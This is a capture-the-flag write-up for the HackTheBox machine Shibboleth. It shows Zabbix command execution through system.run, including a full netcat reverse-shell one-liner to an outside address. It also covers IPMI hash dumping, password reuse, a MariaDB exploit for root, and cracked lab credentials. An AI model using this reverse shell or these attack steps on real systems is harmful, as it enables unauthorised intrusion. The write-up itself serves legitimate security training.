# HackTheBox-Shibboleth ## NMAP ```bash PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Did not follow redirect to http://shibboleth.htb/ Service Info: Host: shibboleth.htb ``` ## PORT 80 (HTTP) On the web server we see a html template page We can check the source which reveals that it's a theme so no point in enumerating here, from the nmap scan it did show us that it was redirecting to a domain name so let's try to run `wfuzz` to bruteforce for subdomains Here it gives us there names, and these all are the same If we hover over the `help` link , it will show us that it's using version 5 of `zabbix` , which is a tool for monitoring the network and ,virtual machines and other services running. Searching for exploits was a rabbit hole here as it was reported that zabbix 5.x is vulnerable to blind sqli but there wasn't any exploits publicily available. I went back to scanning the machine and scanend for `UDP` ports ```bash nmap -p 1-1000 -sU --min-rate 5000 10.129.231.205 -vv PORT STATE SERVICE REASON 45/udp closed mpm port-unreach ttl 63 179/udp closed bgp port-unreach ttl 63 243/udp closed sur-meas port-unreach ttl 63 422/udp closed ariel3 port-unreach ttl 63 459/udp closed ampr-rcmd port-unreach ttl 63 623/udp open asf-rmcp udp-response ttl 63 892/udp closed unknown port-unreach ttl 63 ``` This showed port 623 which was opened and was running `IPMI` Intelligent Platform Management Interface , which is used for controlling and managing hardware services. There was a metasploit module available that can dump `HMAC-SHA1` hashes, so using the module `use auxiliary/scanner/ipmi/ipmi_dumphashes` And we can now crack this hash using `hashcat` ## Foothold To get a foolthold , we can run shell commands through Zabbix agent, in order to do this first we'll need to go to `Configuration` and select `Hosts` Next select the hostname ,which is `shibboleth.htb` , after selecting the hostname , navigate to `items` Click on create `new item` When adding a new item , in the `key` field to run command we need to input `system.run["shell command"]` also change type of information to `text` At the bottom , we can see a button `Test` to check our command So we have command execution here , now we need to get a reverse shell from here ```bash system.run["rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 2222 >/tmp/f",nowait] ``` We are specifying `nowait` here so it does not close the process Stabilizing the reverse shell so we may have a tty shell ## Privilege Escalation (ipmi-svc) I ran `sudo -l` to see if there was any thing this user can run as a different user or as root but we need a password , I tried the zabbix admin password but it failed We can see another user named `ipmi-svc` , let's try the password that we found for this user And this worked , we can find the database creds from `/etc/zabbix/zabbix_server.conf` ## Privilege Escalation (root) After logging in with mysql , it was using `Mariadb` which was using `10.3.25` version, so I searched for if there was any exploit for this version and it returned with a command execution exploit So first we have to generate a shared library file which can be used in any program at run time , transfer that on the target machine Start the netcat listener , and login in with mysql user by executing a command ## References - https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes/ - https://hashcat.net/wiki/doku.php?id=example_hashes - https://subscription.packtpub.com/book/cloud-and-networking/9781800202238/2/ch02lvl1sec20/using-zabbix-preprocessing-to-alter-item-values - https://www.zabbix.com/forum/zabbix-help/21803-system-run-syntax - https://packetstormsecurity.com/files/162177/MariaDB-10.2-Command-Execution.html - ``` Administrator:ilovepumkinpie1 zabbix:bloooarskybluh ```